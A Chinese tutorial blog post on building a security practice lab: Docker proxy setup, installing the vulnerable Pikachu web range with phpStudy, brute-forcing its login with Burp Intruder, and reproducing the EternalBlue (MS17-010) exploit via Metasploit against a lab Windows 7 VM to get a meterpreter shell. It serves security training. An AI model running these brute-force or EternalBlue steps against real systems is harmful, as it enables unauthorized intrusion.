网络安全的靶场搭建

一、docker搭建

1.创建文件夹

root@shadow1-VMware-Virtual-Platform:/home/shadow1# mkdir /etc/systemd/system/docker.service.d

2.vim编辑

root@shadow1-VMware-Virtual-Platform:/etc/systemd/system/docker.service.d# vim http-proxy.con

编辑内容为自己主机ip

3.重新加载、启动及拉取镜像

4.启动容器、查看容器

二、用小皮面板搭建pikachu靶场

1.下载小皮面板(phpstudy)

phpStudy - Windows 一键部署 PHP 开发环境 | 免费本地建站工具 · 小皮出品

 2.将pikachu文件夹放入小皮面板下载根目录的WWW文件夹下

3.打开小皮面板启动套件

4.在浏览器完成站点搭建,在网址栏输入localhost 

 5.再在地址栏加入pichachu,完成对pichachu的访问 

6.点击最上面的提示,进行安装/初始化 

注意!!! 

如果你遇到以下问题:

那大概率是你的MySQL数据库的版本问题 ,可以在小皮面板的软件管理中下载其他的MySQL版本进行尝试。

三、bp 使用爆破模块破解 pikachu 的登陆密码

1.打开pichachu中的表单破解

2.使用Brup进行拦截,并发送给Intruder

3.Brup拦截成功

4.给密码添加位置标识符

5.找到playload

6.点击从文件中加载

7.然后点击发起攻击,得到结果如下

 

 四、msf复现永恒之蓝

本次实验是在Kali系统下进行,请先安装Kali系统。

1.对msf进行更新

2.进入msf模块

3.查看永恒之蓝模块

永恒之蓝的编号(名称)为:MS17-010

 4.使用永恒之蓝的模块

msf6 > use exploit/windows/smb/ms17_010_eternalblue

设置模块的参数(可以只设置必须设置的参数,如:RHOSTS)

RHOSTS需要设置目标主机的ip地址(win7虚拟机上的ip)

msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.182.130

5.运行模块

直接run它,等它攻击成功

msf6 exploit(windows/smb/ms17_010_eternalblue) > run

攻击成功,进入meterpreter终端

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值